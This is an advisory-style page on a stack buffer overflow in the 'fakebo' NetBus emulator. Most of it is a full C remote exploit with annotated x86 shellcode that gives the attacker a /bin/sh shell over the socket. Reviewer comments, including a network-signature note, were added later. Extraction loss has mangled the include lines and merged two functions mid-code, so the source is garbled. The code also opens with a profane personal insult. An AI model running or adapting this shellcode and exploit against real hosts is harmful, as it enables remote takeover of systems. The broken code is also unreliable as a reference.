


FakeBO - Stack buffer overflow, execute arbitrary code, etc. BKI:



Vulnerability

    fakebo

Affected

    It would be really silly if yours

Description

    Groovy Pants Gus found the following. Just your standard smash-the-stack
    buffer overflow: fakebo has an unchecked strcat in its NetBus handling
    code, allowing remote code execution.

    /*

    Hi Myn, hope  you get hit  by a bus  driven by a  postal worker on
    crack.. you too, mindrape.. fuck you

    */

    #define ADDR 0xBFFFE258 /* Return address, YMMV */

    #include 
    #include 
    #include 
    #include 


    #include 

    #include 

    #include 
    #include 
    #include 
    #include 

    #include 

    /* stolen from qpush */
    /* terminal(): presumably a select()-driven relay between the caller's
     * terminal and the connected socket `s` (the fd_set locals suggest it;
     * the body is not visible).
     * NOTE(review): the HTML extraction dropped every '<' on this page, so
     * the `for` header below runs straight into the tail of a second
     * function, resolve(), whose signature and first lines are lost.  The
     * text between `for (i=0;i` and `h_addr;` is missing, not code.  Of
     * resolve() only the failure branch survives: it prints a message and
     * exit(1)s instead of returning an error to main(); `rc` looks like a
     * copied hostent h_addr -- verify against the original source. */
    void terminal(int s) {
      char buf[1024];
      fd_set rfds;
      fd_set fds;
      int i;

      for (i=0;ih_addr;
	else {
	  printf("Unable to resolve %s!\n", host);
	  exit(1);
	}
      }
      return rc;
    }


    /* Shellcode delivered by main().  Layout (from the per-byte comments):
     * a short jmp to the `call backward` at the end, which pushes the
     * address of the trailing data and jumps back to the start; the code
     * then issues three int 80h calls with al = 3Fh (each on descriptor 5,
     * set via `add bl, 05h` and assumed -- never verified -- to be the
     * target's socket, with ecx = 0, 1, 2 in turn) followed by one with
     * al = 0Bh and ebx pointing at "/bin/sh".  The two 0x01 bytes in the
     * data are decremented in place (`dec byte ptr [ecx]`) to become NUL
     * terminators at run time, so the array itself contains no zero byte.
     * Defensive note: the 0x90 sled plus the literal "/bin/sh" in a single
     * write to the fakebo port is an easy network signature, and the fixed
     * descriptor, offsets and ADDR make this brittle against any other
     * build or layout. */
    char overflow[] = { /* Ok, it's not the neatest, deal with it */
    #ifdef DEBUG
    0xCC,                           /* int 03h */
    #endif
    0xEB, 53,                       /* jmp forward (short +53, lands on the call below) */
				    /* backwards: */
    0x33, 0xC0,                     /* xor eax, eax */
    0x04, 0x3F,                     /* add al, 3Fh */
    0x33, 0xDB,                     /* xor ebx, ebx */
    0x33, 0xC9,                     /* xor ecx, ecx */
    0x80, 0xC3, 0x05,               /* add bl, 05h */
    0xCD, 0x80,                     /* int 80h */
   
    0x33, 0xC0,                     /* xor eax, eax */
    0x04, 0x3F,                     /* add al, 3Fh */
    0x41,                           /* inc ecx */
    0xCD, 0x80,                     /* int 80h */

    0x33, 0xC0,                     /* xor eax, eax */
    0x04, 0x3F,                     /* add al, 3Fh */
    0x41,                           /* inc ecx */
    0xCD, 0x80,                     /* int 80h */

    0x5B,                           /* pop ebx (return address pushed by the call = data below) */
    0x58,                           /* pop eax (value discarded; eax is zeroed next) */
    0x33, 0xC0,                     /* xor eax, eax */
    0x04, 0x0B,                     /* add al, 0Bh */

    0x33, 0xD2,                     /* xor edx, edx */
    0x52,                           /* push edx */
    0x8B, 0xCB,                     /* mov ecx, ebx (8B CB encodes ebx, not edx: the data address) */
    0x83, 0xC1, 0x07,               /* add ecx, 07h */
    0xFE, 0x09,                     /* dec byte ptr [ecx] */
    0x83, 0xC1, 0x03,               /* add ecx, 03h */
    0xFE, 0x09,                     /* dec byte ptr [ecx] */
    0x49,                           /* dec ecx */
    0x49,                           /* dec ecx */
    0x51,                           /* push ecx */
    0x8B, 0xCC,                     /* mov ecx, esp */
    0xCD, 0x80,                     /* int 80h */
				    /* forward:*/
    0xE8, 0xC4, 0xFF, 0xFF, 0xFF,   /* call backward */
    /* data */
    0x2F, 0x62, 0x69, 0x6E, 0x2F, 0x73, 0x68,       /* "/bin/sh" */
    0x01,                                           /* 0x01 */
    0x73, 0x68,                                     /* "sh" */
    0x01                                            /* 0x01 */
    };

    /* Target TCP port: 12345 unless argv[1] carries a ":port" suffix (see main()). */
    int port = 12345;

    /* Entry point.  Usage: <program> host[:port] -- the argument placeholder
     * in the usage string below was lost in HTML extraction.  Connects to the
     * fakebo service over TCP, sends a single 1003-byte write made of a 0x90
     * sled, the `overflow` payload and the hard-coded return address ADDR,
     * then hands the socket to terminal().
     *
     * Review notes (code left as-is):
     *  - `void main` is non-standard; it should be `int main` returning a value.
     *  - Every local failure path calls exit(0) (resolve() uses exit(1)), so a
     *    failed socket()/connect() still reports success to the shell.
     *  - The port comes from atoi() with no range check, and `sin` is never
     *    zeroed, so sin_zero stays uninitialized.
     *  - Everything is positional: the payload ends at offset 998, the return
     *    address sits at 999..1002 and is ADDR ("YMMV"), and overflow[] hard-
     *    codes descriptor 5 -- none of this is checked, which is why the
     *    exploit is brittle against any other build or stack layout. */
    void main (int argc, char **argv) {
      int i, rc;
      char buf[2048];                  /* only indices 0..1002 are ever sent */
      struct sockaddr_in sin;
      char *s;
      int sock;

      if (argc != 2) {
	printf("Usage: %s \n", argv[0]);
	exit(0);
      }
      /* "host:port" is split in place; atoi() accepts any text, including 0 */
      s = strchr(argv[1], ':');
      if (s) {
	*s=0;
	port = atoi(s+1);
      }

      sin.sin_port = htons(port);
      sin.sin_addr.s_addr = resolve(argv[1]);   /* resolve() exit()s on failure */
      sin.sin_family = AF_INET;

      sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
      if (sock == -1) {
	perror("socket()");
	exit(0);
      }

      rc = connect(sock, (struct sockaddr *)&sin, sizeof(sin));
      if (rc == -1) {
	perror("connect()");
	exit(0);
      }

      /* NOP sled: bytes 0..1499 become 0x90; 1500..2047 are left
       * uninitialized (never read, since only 1003 bytes are sent). */
      for (i=0;i<1500;i++)
	buf[i]=0x90;

      /* Payload is placed so that its last byte lands at index 998. */
      memcpy(&buf[999-sizeof(overflow)], overflow, sizeof(overflow));

      /* Return address, little-endian, at 999..1002. */
      buf[999]=ADDR & 0xFF;
      buf[1000]=(ADDR >> 8) & 0xFF;
      buf[1001]=(ADDR >> 16) & 0xFF;
      buf[1002]=(ADDR >> 24) & 0xFF;
      /* NOTE(review): written at index 1003, but the send() below transmits
       * 1003 bytes (indices 0..1002), so this newline never goes on the wire. */
      buf[1003]='\n';

      /* Single unchecked send(): the return value and short writes are ignored. */
      send(sock, buf, 1003, 0);
 
      terminal(sock);
      exit(0);
    }

Solution

    Nothing yet.

